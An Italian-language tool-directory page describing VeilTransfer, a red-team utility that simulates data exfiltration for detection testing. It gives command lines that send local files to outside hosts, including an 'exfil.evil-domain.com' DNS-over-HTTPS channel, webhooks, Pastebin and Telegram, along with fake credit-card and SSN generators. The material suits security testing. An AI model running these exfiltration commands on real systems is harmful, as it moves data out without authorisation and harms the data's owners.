Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
VeilTransfer — VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture. | Kitploit
Strumenti/GitHubGitHub/infosecn1nja/veiltransfer
Data ExfiltrationNetwork SecurityPenetration TestingRed Teaming
GitHubinfosecn1nja/veiltransfer

VeilTransfer

VeilTransfer is a data exfiltration utility designed to test and enhance the detection capabilities. This tool simulates real-world data exfiltration techniques used by advanced threat actors, allowing organizations to evaluate and improve their security posture.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
157227 mesi faRevisionato da Kitploit

VeilTransfer 2.0

VeilTransfer è un'utility per l'esfiltrazione di dati progettata per testare e migliorare le capacità di rilevamento. Questo strumento simula tecniche di esfiltrazione dati reali utilizzate da attori di minaccia avanzati, consentendo alle organizzazioni di valutare e migliorare la propria postura di sicurezza. Sfruttando molteplici metodi di esfiltrazione come MEGA, GitHub, SFTP, WebDAV e altri, VeilTransfer aiuta a identificare le lacune nelle tue difese e garantisce che le tue soluzioni di sicurezza siano pronte a contrastare le moderne violazioni dei dati.

Metodi di esfiltrazione supportati

  • MEGA
  • GitHub
  • Dropbox
  • Telegram
  • Pastebin
  • WebDAV
  • Webhook
  • SFTP
  • FTP
  • DoH (DNS over HTTPS)
  • QUIC
  • ICMP

Mapping MITRE ATT&CK

IDTecniche
T1029Scheduled Transfer
T1020Automated Exfiltration
T1132.001Data Encoding: Standard Encoding
T1560.002Archive Collected Data: Archive via Library
T1567.001Exfiltration Over Web Service: Exfiltration to Code Repository
T1567.002Exfiltration Over Web Service: Exfiltration to Cloud Storage
T1567.003Exfiltration Over Web Service: Exfiltration to Text Storage
T1567.004Exfiltration Over Web Service: Exfiltration Over Webhook
T1048.003Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
T1048.002Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Funzionalità aggiuntive

Generazione di dati fittizi

VeilTransfer supporta anche la generazione di dati fittizi, tra cui:

  • Numeri di carta d'identità indonesiana (KTP): Genera numeri KTP realistici e dati associati.
  • Informazioni su carte di credito: Crea dettagli di carte di credito fittizie in formato PCI DSS, inclusi nome, cognome, CCN (Visa/MasterCard/AMEX) e data di scadenza.
  • Numeri di previdenza sociale (SSN): Genera SSN fittizi da usare in simulazioni e ambienti di test.
  • Cartelle cliniche: Genera dati di cartelle cliniche fittizie in indonesiano (id) o inglese (en).

Creazione di file Zip

Crea facilmente file zip per raggruppare e comprimere dati, che possono poi essere utilizzati per l'esfiltrazione o per testare diversi scenari. Supporta la suddivisione opzionale in più file in base alla dimensione.

Esempi di casi d'uso

  • Operazioni Red Team: Distribuisci VeilTransfer durante esercitazioni red team per mettere alla prova i blue team con scenari di esfiltrazione sofisticati e realistici.
  • Purple Teaming: Collabora con i tuoi team difensivi per simulare e poi rilevare i tentativi di esfiltrazione, affinando sia le tattiche offensive che difensive.
  • Test di sicurezza: Usa VeilTransfer per validare l'efficacia di DLP, NDR, firewall e altre misure di sicurezza di rete.

Esempio di utilizzo

Trasferimento

Trasferire un file via SFTP

Questo esempio mostra come trasferire in modo sicuro un file a un server remoto utilizzando il protocollo SFTP. Il file si trova sulla macchina locale e viene trasferito nella directory remota specificata utilizzando l'autenticazione SSH.

root@kitploit:~
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass

Trasferire file a un server WebDAV

In questo esempio, i file di una directory locale vengono caricati su un server WebDAV. Il server richiede nome utente e password per l'autenticazione. Il parametro server include lo schema URI (https:// o http://).

root@kitploit:~
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass

Trasferire file su Mega Cloud

Questo esempio mostra come trasferire file su Mega Cloud. I file vengono caricati da una directory locale specificata e l'autenticazione avviene tramite le credenziali Mega Cloud dell'utente.

root@kitploit:~
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword

Trasferire file via FTP

In questo esempio, un file viene caricato su un server FTP. Il file viene trasferito in una directory specifica sul server remoto. Il server richiede nome utente e password per l'autenticazione.

root@kitploit:~
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword

Caricare un file su Pastebin

Questo esempio mostra come caricare il contenuto di un file su Pastebin. Il contenuto viene pubblicato su Pastebin utilizzando una chiave API fornita dall'utente.

root@kitploit:~
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key

Inviare un file a un repository GitHub

Questo esempio mostra come inviare un file dalla macchina locale a un repository GitHub specifico. Il file viene aggiunto al repository utilizzando il token API GitHub dell'utente per l'autenticazione.

root@kitploit:~
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token

Inviare un file a un canale Telegram

Questo esempio mostra come inviare un file a un canale Telegram specifico. Il file viene inviato utilizzando un token API di un bot Telegram e il messaggio viene consegnato all'ID canale specificato.

root@kitploit:~
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789

Inviare dati a un URL Webhook

In questo esempio, il contenuto di un file viene inviato a un URL Webhook specificato.

root@kitploit:~
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url

Trasferire file via DoH (DNS over HTTPS)

Per stabilire un meccanismo sicuro di esfiltrazione dei dati che utilizzi DNS over HTTPS (DoH), devono essere configurati i seguenti record DNS:

  1. Record A: Punta test all'indirizzo IP <VeilTransfer_IP_Address>.

    test -> <VeilTransfer_IP_Address>

  2. Record NS: Definisci un sottodominio (exfil) gestito da evil-domain.com.

    exfil -> test.evil-domain.com

Il dominio exfil.evil-domain.com fungerà da dominio DNS Exfil.

Quindi, avvia il server VeilTransfer in modalità DoH con il seguente comando:

root@kitploit:~
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil

Nota: La chiave di cifratura (-key) deve essere lunga 16 o 32 caratteri.

Per caricare file via DoH, assicurati che il server VeilTransfer sia attivo in modalità DoH con una chiave di cifratura valida. Quindi, avvia il trasferimento usando il comando client:

root@kitploit:~
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com

Trasferire file via QUIC

Per avviare il server VeilTransfer in modalità QUIC, usa il seguente comando:

root@kitploit:~
veiltransfer_server quic -cert /path/server.crt -key /path/server.key

Una volta che il server è in esecuzione, puoi caricare file o directory usando:

root@kitploit:~
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443

Trasferire file via ICMP

Per abilitare i trasferimenti di file tramite il protocollo ICMP, avvia il server VeilTransfer in modalità ICMP eseguendo il seguente comando:

root@kitploit:~
veiltransfer_server_linux icmp -folder /path/folder

Una volta che il server è attivo, esegui il seguente comando per trasferire file o directory via ICMP:

root@kitploit:~
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>

Creare file Zip

Creare un semplice file Zip

Crea un archivio zip da una directory specificata.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip

Creare un file Zip suddiviso

Crea un archivio zip suddiviso in più parti in base alla dimensione specificata.

root@kitploit:~
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000

Generatore di dati

Genera 100 numeri di carte di credito fittizie

Questo esempio mostra come generare 100 voci di dati di carte di credito fittizie. I dati generati includeranno numeri di carta di credito, date di scadenza e dettagli associati.

root@kitploit:~
veiltransfer_client generate-fake -ccn -count 100

Genera 50 voci KTP indonesiane fittizie

Questo esempio mostra come generare 50 voci di dati KTP fittizi, ovvero carte d'identità indonesiane. I dati includono informazioni personali come nome, indirizzo e numero KTP.

root@kitploit:~
veiltransfer_client generate-fake -ktp -count 50

Genera 200 numeri di previdenza sociale fittizi

I dati generati includono numeri di previdenza sociale formattati secondo gli standard statunitensi.

root@kitploit:~
veiltransfer_client generate-fake -ssn -count 200

Genera 300 cartelle cliniche fittizie in inglese

Questo esempio mostra come generare 300 cartelle cliniche fittizie in inglese.

root@kitploit:~
veiltransfer_client generate-fake -medical-record -count 300 -language en

Contributi

I contributi a VeilTransfer sono benvenuti! Se hai idee per nuove funzionalità, metodi di esfiltrazione o miglioramenti, invia una pull request o apri una issue su GitHub.

Scarica lo strumento